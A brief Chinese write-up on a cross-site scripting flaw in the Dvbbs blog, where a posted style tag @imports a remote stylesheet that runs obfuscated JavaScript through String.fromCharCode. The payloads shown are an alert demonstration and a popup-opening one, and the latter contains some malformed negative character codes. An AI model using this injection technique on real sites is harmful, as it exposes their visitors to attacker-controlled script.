动网BOKE的CSS跨站漏洞分析
前一段时间,找到了动网 BOKE的跨站漏洞,这个漏洞可以用CSS来跨站,也就是样式表,具体的跨站方法是:
基本利用方法
选择"代码"方式,在其中输入以下代码:
<style type='text/css'>@import url(http://www.pc010.cn/1.css);</style>
其中的@import 是CSS的自定义属性,url是要链接的CSS样式,而 http://www.pc010.cn/1.css 的内容如下:
<style type="text/css">
<!--
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
-->
</style>
这是一段弹出alert窗口的代码,其中的String.fromCharCode是用来将字符转为ASCII值的函数。
打开新窗口的代码
OPEN 的代码如下:
@import url(javascript:eval(String.fromCharCode(111,112,101,110,40,39,104,116,116,112,58,47,47,119,119,119,46,110,111,104,97,99,107,46,99,110,39,44,39,-17702,-16435,-13610,-19743,39,44,39,119,105,100,116,104,61,50,48,48,44,104,101,105,103,104,116,61,50,48,48,39,41,59)));



